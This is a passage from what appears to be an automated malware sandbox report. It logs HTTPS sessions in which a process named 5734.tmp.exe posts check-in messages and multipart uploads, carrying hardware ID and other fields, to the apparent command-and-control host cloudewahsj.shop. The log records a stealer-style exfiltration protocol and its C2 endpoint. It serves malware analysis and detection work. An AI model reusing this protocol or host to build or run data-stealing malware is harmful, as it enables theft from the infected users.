                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNlPCDHI0SiiEireAi7VC55LIbj%2Bhh2h1THm3GV9i4agZmHYSmYs0EzbxhgsyA8DhLAzLzFf2ZFLrvPgMddP%2BpyvO081Hlk3Yf6n%2FMijh9jXesEjsJtlINPkOdElrXMwgor%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e778ce891a48-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1992&rtt_var=754&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=907&delivery_rate=1444114&cwnd=157&unsent_bytes=0&cid=3561b8d2d4c00cce&ts=495&x=0"
                                                                                                  2025-01-05 07:55:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-05 07:55:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.649713104.21.96.14433544C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:07 UTC264OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 74
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:55:07 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                  2025-01-05 07:55:08 UTC1121INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:08 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=o475o22t25n02sbnmle9sjj87h; expires=Thu, 01 May 2025 01:41:47 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jNf37f1mm1woLhyj2dJaCu9v8j%2FD0n%2BM%2FIdhnEHZYfU4a4YU6N6q5MwtDY69fPUQrtnVba3wyhvWipgkiVMDgqt2elBJo8wyMfCalV3wZh6SwAwRwU4gNz4FcGgVp3YVLyp1"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e77ec86ade9a-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1603&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=974&delivery_rate=1750599&cwnd=209&unsent_bytes=0&cid=af5be18ffcf277ec&ts=487&x=0"
                                                                                                  2025-01-05 07:55:08 UTC248INData Raw: 34 63 39 30 0d 0a 6c 5a 48 4f 57 44 6f 4d 62 50 48 34 76 79 4a 62 57 72 4c 6f 42 78 4f 66 72 71 59 78 54 62 76 75 70 69 32 34 41 32 69 6c 55 41 62 75 73 37 68 36 41 44 68 41 30 34 76 61 41 47 45 75 77 4a 31 69 50 37 33 50 77 68 4e 33 33 59 2f 4b 58 74 30 76 53 74 4d 39 4a 4b 2f 33 72 7a 52 4a 61 55 44 54 6e 63 63 41 59 51 48 4a 79 6d 4a 39 76 5a 53 45 56 43 66 5a 6a 38 70 50 32 57 67 48 31 54 78 6c 2f 66 32 70 4d 46 39 76 43 4a 43 55 30 6b 63 2b 50 39 4f 43 61 58 72 79 78 73 73 54 59 5a 6d 4c 33 41 2b 43 49 53 58 41 4a 47 66 59 38 4c 30 7a 47 48 46 41 69 74 72 61 54 48 6c 67 6b 49 6c 69 63 66 50 49 77 6c 6f 6c 30 34 62 43 54 74 78 70 47 4d 77 32 62 76 33 7a 71 6a 46 56 5a 68 79 64 6e 74 56 4d 4f 44 58 54 79 69 73 78 2b 74 53 45 43 32
                                                                                                  Data Ascii: 4c90lZHOWDoMbPH4vyJbWrLoBxOfrqYxTbvupi24A2ilUAbus7h6ADhA04vaAGEuwJ1iP73PwhN33Y/KXt0vStM9JK/3rzRJaUDTnccAYQHJymJ9vZSEVCfZj8pP2WgH1Txl/f2pMF9vCJCU0kc+P9OCaXryxssTYZmL3A+CISXAJGfY8L0zGHFAitraTHlgkIlicfPIwlol04bCTtxpGMw2bv3zqjFVZhydntVMODXTyisx+tSEC2
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 2b 4b 76 73 64 65 79 33 51 48 31 7a 51 6b 36 4c 32 31 65 6c 39 69 54 73 76 61 31 55 77 33 50 64 4f 46 59 6e 44 39 33 73 74 54 4c 4e 47 45 77 45 58 56 62 67 58 4a 4f 47 50 2f 2b 71 73 31 58 32 59 49 6e 4a 6d 64 44 6e 6b 2f 79 4d 6f 39 4d 64 33 63 78 31 41 37 31 4a 32 45 55 4a 52 34 53 73 41 2b 4a 4b 2b 7a 71 6a 52 5a 59 77 36 42 6b 74 5a 4c 50 43 72 62 67 32 68 38 2f 63 48 4f 58 43 7a 5a 69 38 35 46 31 57 73 4f 79 6a 39 69 39 2f 50 73 64 42 68 70 46 74 50 43 6e 57 4d 38 4b 4e 65 47 63 7a 50 48 6a 4e 73 64 4e 70 6d 4c 79 41 2b 43 49 51 4c 43 4d 57 66 38 2f 4b 38 79 55 33 77 4f 67 5a 7a 51 52 53 73 2b 31 59 52 76 63 75 2f 47 79 6c 55 73 30 49 66 4e 53 74 31 6c 53 6f 6c 79 59 2b 2b 7a 39 48 70 35 59 77 57 66 6b 4d 70 41 65 53 65 65 6b 79 56 32 38 59 79 63 45
                                                                                                  Data Ascii: +Kvsdey3QH1zQk6L21el9iTsva1Uw3PdOFYnD93stTLNGEwEXVbgXJOGP/+qs1X2YInJmdDnk/yMo9Md3cx1A71J2EUJR4SsA+JK+zqjRZYw6BktZLPCrbg2h8/cHOXCzZi85F1WsOyj9i9/PsdBhpFtPCnWM8KNeGczPHjNsdNpmLyA+CIQLCMWf8/K8yU3wOgZzQRSs+1YRvcu/GylUs0IfNSt1lSolyY++z9Hp5YwWfkMpAeSeekyV28YycE
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 45 41 5a 70 6d 45 6f 64 71 4a 4e 33 77 75 44 6c 53 4c 44 75 51 6c 4e 4e 48 4c 33 6a 50 78 48 77 78 2b 73 43 45 43 32 2f 55 6a 63 78 4a 79 47 34 48 78 44 78 71 2b 50 61 6a 4d 6c 68 75 41 35 61 65 31 6b 73 36 4e 64 53 59 62 33 48 31 79 63 56 5a 4a 5a 6e 43 68 45 6a 43 49 56 4b 48 41 33 50 38 73 5a 6b 35 56 6d 41 4a 68 64 72 43 44 69 42 34 31 34 59 6c 4b 62 33 42 7a 46 59 71 31 6f 33 4f 51 64 39 72 42 73 38 38 5a 2b 58 38 71 44 70 55 5a 67 53 65 6c 4e 6c 49 4d 44 50 62 6a 47 56 77 39 34 79 4b 45 79 6a 42 7a 4a 77 50 37 6d 59 47 79 6a 30 6d 77 76 43 69 4e 46 39 34 54 6f 7a 55 78 41 41 2b 4e 4a 44 53 4a 58 33 30 7a 4d 39 5a 4b 39 6d 4c 79 55 72 5a 5a 67 6e 4b 4e 57 37 35 39 4b 67 32 55 57 4d 49 6b 35 33 5a 52 53 73 39 32 59 5a 70 4d 62 4f 4d 77 30 74 76 67 63
                                                                                                  Data Ascii: EAZpmEodqJN3wuDlSLDuQlNNHL3jPxHwx+sCEC2/UjcxJyG4HxDxq+PajMlhuA5ae1ks6NdSYb3H1ycVZJZnChEjCIVKHA3P8sZk5VmAJhdrCDiB414YlKb3BzFYq1o3OQd9rBs88Z+X8qDpUZgSelNlIMDPbjGVw94yKEyjBzJwP7mYGyj0mwvCiNF94TozUxAA+NJDSJX30zM9ZK9mLyUrZZgnKNW759Kg2UWMIk53ZRSs92YZpMbOMw0tvgc
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 49 56 4b 48 4f 32 33 6c 2f 61 49 7a 56 57 67 47 6c 4a 54 51 53 7a 38 7a 31 34 31 6a 66 50 58 42 77 56 41 75 33 59 62 57 54 4e 46 72 42 38 31 79 4b 72 66 30 74 48 6f 41 4c 69 6d 66 73 38 31 62 4b 79 36 51 6c 53 74 6f 76 63 76 49 45 33 65 5a 6a 38 74 47 31 57 6b 43 79 44 31 67 2b 66 57 71 4e 31 31 68 42 49 47 53 30 30 30 79 4e 39 75 59 5a 58 7a 35 77 4d 42 62 4a 4e 50 4d 69 67 2f 64 65 55 71 66 63 6c 48 36 2f 4b 77 35 54 69 34 52 33 59 4f 64 52 7a 56 34 69 4d 70 70 66 2f 33 44 79 46 38 6b 30 59 33 49 51 64 31 6b 41 38 38 36 64 76 62 33 70 44 74 57 59 51 2b 58 6e 39 68 45 50 6a 7a 57 68 53 55 2f 76 63 76 63 45 33 65 5a 6f 2b 4e 36 6d 45 41 77 68 79 30 71 37 72 4f 72 4e 68 67 32 54 70 2b 5a 30 55 67 32 50 74 6d 47 62 33 6a 32 77 4d 39 58 49 39 43 4a 77 6b 37
                                                                                                  Data Ascii: IVKHO23l/aIzVWgGlJTQSz8z141jfPXBwVAu3YbWTNFrB81yKrf0tHoALimfs81bKy6QlStovcvIE3eZj8tG1WkCyD1g+fWqN11hBIGS000yN9uYZXz5wMBbJNPMig/deUqfclH6/Kw5Ti4R3YOdRzV4iMppf/3DyF8k0Y3IQd1kA886dvb3pDtWYQ+Xn9hEPjzWhSU/vcvcE3eZo+N6mEAwhy0q7rOrNhg2Tp+Z0Ug2PtmGb3j2wM9XI9CJwk7
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 54 56 74 35 66 32 68 4e 56 42 6d 42 35 4b 65 32 45 30 2f 4e 4e 71 4c 59 6e 2f 7a 78 49 51 64 62 39 36 55 68 42 65 61 51 42 72 63 49 48 4c 36 30 71 45 31 47 48 46 41 69 74 72 61 54 48 6c 67 6b 49 4e 33 64 66 44 65 7a 56 51 68 31 6f 2f 57 54 74 64 71 47 4d 41 39 59 50 44 2f 71 6a 56 65 62 77 75 5a 6c 74 70 46 4d 6a 66 63 79 69 73 78 2b 74 53 45 43 32 2f 33 68 39 64 59 32 57 38 42 30 53 6b 6b 36 4c 32 31 65 6c 39 69 54 73 76 61 33 6b 73 79 50 4e 43 47 5a 58 58 77 7a 4e 5a 63 4b 4e 36 46 7a 31 33 51 5a 67 33 4d 4f 6d 2f 34 39 62 34 32 56 6e 77 4c 67 59 69 64 44 6e 6b 2f 79 4d 6f 39 4d 63 76 4c 31 45 4d 73 6d 37 33 53 54 4d 78 71 42 38 74 79 65 37 6e 71 37 44 31 55 4c 6c 62 54 6e 4e 4a 4a 4f 6a 66 52 67 32 6c 38 2b 4d 58 42 55 69 6e 64 68 73 35 50 33 47 63 4c
                                                                                                  Data Ascii: TVt5f2hNVBmB5Ke2E0/NNqLYn/zxIQdb96UhBeaQBrcIHL60qE1GHFAitraTHlgkIN3dfDezVQh1o/WTtdqGMA9YPD/qjVebwuZltpFMjfcyisx+tSEC2/3h9dY2W8B0Skk6L21el9iTsva3ksyPNCGZXXwzNZcKN6Fz13QZg3MOm/49b42VnwLgYidDnk/yMo9McvL1EMsm73STMxqB8tye7nq7D1ULlbTnNJJOjfRg2l8+MXBUindhs5P3GcL
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 66 30 6f 48 6f 41 4c 67 32 55 6d 64 78 4b 4d 44 54 66 6a 57 46 6a 39 38 76 57 55 69 37 53 67 63 68 50 31 32 77 41 78 6a 74 70 2b 2f 36 72 50 56 64 72 54 74 33 61 32 6c 68 35 59 4a 43 72 61 48 72 78 6c 35 34 54 4d 4a 65 56 68 45 6a 57 49 56 4b 48 4d 6d 37 79 2b 61 45 35 56 32 30 63 6b 70 7a 50 51 44 51 79 77 6f 42 75 64 50 44 42 79 56 41 70 33 34 66 49 58 64 4e 68 43 63 78 79 4b 72 66 30 74 48 6f 41 4c 69 32 45 6a 4e 64 48 4e 53 37 62 69 32 5a 6e 38 4e 79 45 48 57 2f 49 69 39 55 50 67 6e 63 61 30 44 56 37 75 65 72 73 50 56 51 75 56 74 4f 63 31 45 59 2b 50 74 36 59 59 48 66 79 77 38 31 61 4b 39 47 50 78 45 76 65 5a 67 2f 45 50 6d 2f 77 38 4b 4d 2b 55 57 41 48 6e 4e 71 54 41 44 34 67 6b 4e 49 6c 55 4f 62 50 79 46 35 76 78 73 4c 64 44 39 31 74 53 70 39 79 61
                                                                                                  Data Ascii: f0oHoALg2UmdxKMDTfjWFj98vWUi7SgchP12wAxjtp+/6rPVdrTt3a2lh5YJCraHrxl54TMJeVhEjWIVKHMm7y+aE5V20ckpzPQDQywoBudPDByVAp34fIXdNhCcxyKrf0tHoALi2EjNdHNS7bi2Zn8NyEHW/Ii9UPgnca0DV7uersPVQuVtOc1EY+Pt6YYHfyw81aK9GPxEveZg/EPm/w8KM+UWAHnNqTAD4gkNIlUObPyF5vxsLdD91tSp9ya
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 78 54 6d 73 4a 68 64 6a 6f 51 7a 63 32 31 35 77 6c 62 73 4b 43 68 46 4a 76 67 62 58 64 44 38 77 68 55 70 56 38 4a 4f 57 7a 39 48 6f 66 62 52 79 42 6e 4e 35 57 4f 6e 2f 75 74 45 4a 6e 39 38 76 55 56 44 6a 57 7a 49 6f 50 31 53 46 53 2f 6e 4a 74 38 4f 69 39 4c 46 56 2b 43 64 4f 6c 6b 77 41 68 65 49 6a 4b 55 48 4c 7a 77 73 4e 46 50 70 53 72 30 6b 58 64 63 51 33 51 50 53 53 35 73 36 70 36 41 44 31 41 30 35 37 4d 41 47 46 6f 67 74 45 77 49 71 71 63 6c 6b 78 68 77 4d 7a 53 44 34 49 7a 52 49 63 67 4a 4b 2b 7a 36 7a 6c 4b 66 41 69 51 6a 4e 34 48 42 77 62 33 6b 47 68 33 36 74 33 36 62 53 6a 44 67 63 4a 59 79 79 30 66 78 44 78 71 38 4f 58 73 64 42 68 68 54 73 75 6a 6e 51 68 35 42 35 37 4b 66 54 47 6c 6a 50 46 51 49 64 65 4c 30 6c 36 58 52 68 44 4b 4e 48 50 6d 73 2b
                                                                                                  Data Ascii: xTmsJhdjoQzc215wlbsKChFJvgbXdD8whUpV8JOWz9HofbRyBnN5WOn/utEJn98vUVDjWzIoP1SFS/nJt8Oi9LFV+CdOlkwAheIjKUHLzwsNFPpSr0kXdcQ3QPSS5s6p6AD1A057MAGFogtEwIqqclkxhwMzSD4IzRIcgJK+z6zlKfAiQjN4HBwb3kGh36t36bSjDgcJYyy0fxDxq8OXsdBhhTsujnQh5B57KfTGljPFQIdeL0l6XRhDKNHPms+
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 44 59 47 49 32 30 4d 76 4f 35 65 30 57 31 62 7a 79 38 56 46 50 38 36 44 2b 6e 48 50 59 67 54 4a 4e 58 4c 6d 73 2b 4a 36 56 79 35 57 71 74 71 56 41 41 5a 32 6b 4a 49 6c 4b 62 33 35 78 31 30 68 33 70 72 56 41 76 31 76 44 63 59 6b 64 4f 44 38 37 48 51 59 61 45 37 4c 79 4a 4d 41 50 53 6d 51 30 6a 55 6a 70 70 6d 58 42 48 2b 4c 6b 34 70 57 6d 6e 64 4b 6e 32 41 71 74 2b 48 73 59 68 67 70 44 59 47 49 32 30 4d 76 4f 35 65 30 57 31 62 7a 79 38 56 46 50 38 36 44 69 32 48 73 51 44 54 35 4a 32 66 35 2f 61 73 73 53 53 35 41 30 35 57 64 47 41 42 34 6d 4d 70 61 50 37 33 55 68 41 74 76 37 49 2f 4b 51 64 31 33 47 34 6f 56 61 76 44 79 75 69 70 50 59 55 47 39 72 50 77 41 64 33 6a 57 79 6a 30 6a 73 34 7a 41 51 6d 2b 42 33 4a 59 55 6a 7a 4a 64 6c 32 42 37 75 65 72 73 4c 42 67
                                                                                                  Data Ascii: DYGI20MvO5e0W1bzy8VFP86D+nHPYgTJNXLms+J6Vy5WqtqVAAZ2kJIlKb35x10h3prVAv1vDcYkdOD87HQYaE7LyJMAPSmQ0jUjppmXBH+Lk4pWmndKn2Aqt+HsYhgpDYGI20MvO5e0W1bzy8VFP86Di2HsQDT5J2f5/assSS5A05WdGAB4mMpaP73UhAtv7I/KQd13G4oVavDyuipPYUG9rPwAd3jWyj0js4zAQm+B3JYUjzJdl2B7uersLBg
                                                                                                  2025-01-05 07:55:08 UTC1369INData Raw: 4e 70 51 4f 6e 69 65 79 6d 6b 78 70 59 7a 4a 51 53 6a 4a 6a 34 68 49 77 47 5a 4b 32 48 78 39 74 2b 58 73 59 67 73 67 54 6f 48 61 68 51 42 2b 4e 74 32 4c 5a 6e 2f 2b 33 74 5a 56 4c 4d 2b 50 67 33 48 6b 54 42 6a 41 49 6d 65 31 77 71 45 2b 54 6e 73 4e 67 35 33 6a 66 68 51 71 31 35 70 6d 4d 39 48 4c 79 56 38 52 35 37 76 56 53 4d 6f 6a 4c 4d 51 6b 5a 37 65 39 37 43 49 59 4e 6b 36 2b 69 4e 70 51 4f 6e 72 38 6a 57 68 39 76 64 4f 4b 53 6d 2f 50 7a 4a 77 63 6c 43 45 59 68 32 6f 6b 73 50 43 2b 4b 46 35 74 47 4a 44 64 34 33 34 55 4b 74 65 61 5a 6a 50 4d 77 63 42 46 4f 74 71 63 77 33 48 6b 54 42 6a 41 49 6d 65 31 31 70 5a 34 61 58 67 4e 6b 35 54 61 41 48 64 34 79 4d 6f 39 4d 64 44 65 77 30 4d 73 6d 36 6e 2b 44 65 74 33 43 63 63 38 59 37 65 39 37 44 59 59 4e 6b 36 65
                                                                                                  Data Ascii: NpQOnieymkxpYzJQSjJj4hIwGZK2Hx9t+XsYgsgToHahQB+Nt2LZn/+3tZVLM+Pg3HkTBjAIme1wqE+TnsNg53jfhQq15pmM9HLyV8R57vVSMojLMQkZ7e97CIYNk6+iNpQOnr8jWh9vdOKSm/PzJwclCEYh2oksPC+KF5tGJDd434UKteaZjPMwcBFOtqcw3HkTBjAIme11pZ4aXgNk5TaAHd4yMo9MdDew0Msm6n+Det3Ccc8Y7e97DYYNk6e


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.649715104.21.96.14433544C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:09 UTC273OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=1J7F5XH1T
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 12800
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:55:09 UTC12800OUTData Raw: 2d 2d 31 4a 37 46 35 58 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 43 37 35 30 31 43 31 39 36 39 32 38 33 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 31 4a 37 46 35 58 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4a 37 46 35 58 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 31 4a 37 46 35 58 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                  Data Ascii: --1J7F5XH1TContent-Disposition: form-data; name="hwid"1CC7501C19692836822D1F4978021086--1J7F5XH1TContent-Disposition: form-data; name="pid"2--1J7F5XH1TContent-Disposition: form-data; name="lid"4h5VfH----1J7F5XH1TContent-Dispositi
                                                                                                  2025-01-05 07:55:09 UTC1128INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:09 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=fetosul9e0mj07ufi3gbv3ge4i; expires=Thu, 01 May 2025 01:41:48 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7kz80yHd%2FHKlQHKhMXI9cGiKZMatM08OqU0%2BoHNjPYYaanSu2bQCrGgeHHVoYId5K05QYiwSBW4TTyqQdGeI%2BeehCj%2FRgHkUSEQRlcGDAOTxWiMbiD%2Fq6aE7KuYb5txxS1z2"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e7868ac61a48-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2016&rtt_var=762&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13731&delivery_rate=1430671&cwnd=157&unsent_bytes=0&cid=339fdf87274c340e&ts=518&x=0"
                                                                                                  2025-01-05 07:55:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:55:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.649721104.21.96.14433544C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:10 UTC274OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=98L01M5AUX
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 15052
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:55:10 UTC15052OUTData Raw: 2d 2d 39 38 4c 30 31 4d 35 41 55 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 43 37 35 30 31 43 31 39 36 39 32 38 33 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 39 38 4c 30 31 4d 35 41 55 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 38 4c 30 31 4d 35 41 55 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 38 4c 30 31 4d 35 41 55 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                  Data Ascii: --98L01M5AUXContent-Disposition: form-data; name="hwid"1CC7501C19692836822D1F4978021086--98L01M5AUXContent-Disposition: form-data; name="pid"2--98L01M5AUXContent-Disposition: form-data; name="lid"4h5VfH----98L01M5AUXContent-Dispo
                                                                                                  2025-01-05 07:55:10 UTC1125INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:10 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=372253924hhao74mm4ueq6fkq1; expires=Thu, 01 May 2025 01:41:49 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FuKbwAVTsJVRBb6IlwzYXfryGGV6BMaBsIyWAW90S8nAd7sHDHg4TMsBJ7BEgwtekvuvHkT3poldz3TgzX3sIJQPJ%2FHGMtLm1dNl62t9%2FEGaDyJb2SrG0o4DGckH7jr0H0V"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e78d7b4c72a4-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1961&rtt_var=749&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15984&delivery_rate=1447694&cwnd=212&unsent_bytes=0&cid=c7c9859aee1133cf&ts=522&x=0"
                                                                                                  2025-01-05 07:55:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:55:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.649732104.21.96.14433544C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:11 UTC279OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=R6CJX3XOEB58LQL
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 19940
                                                                                                  Host: cloudewahsj.shop
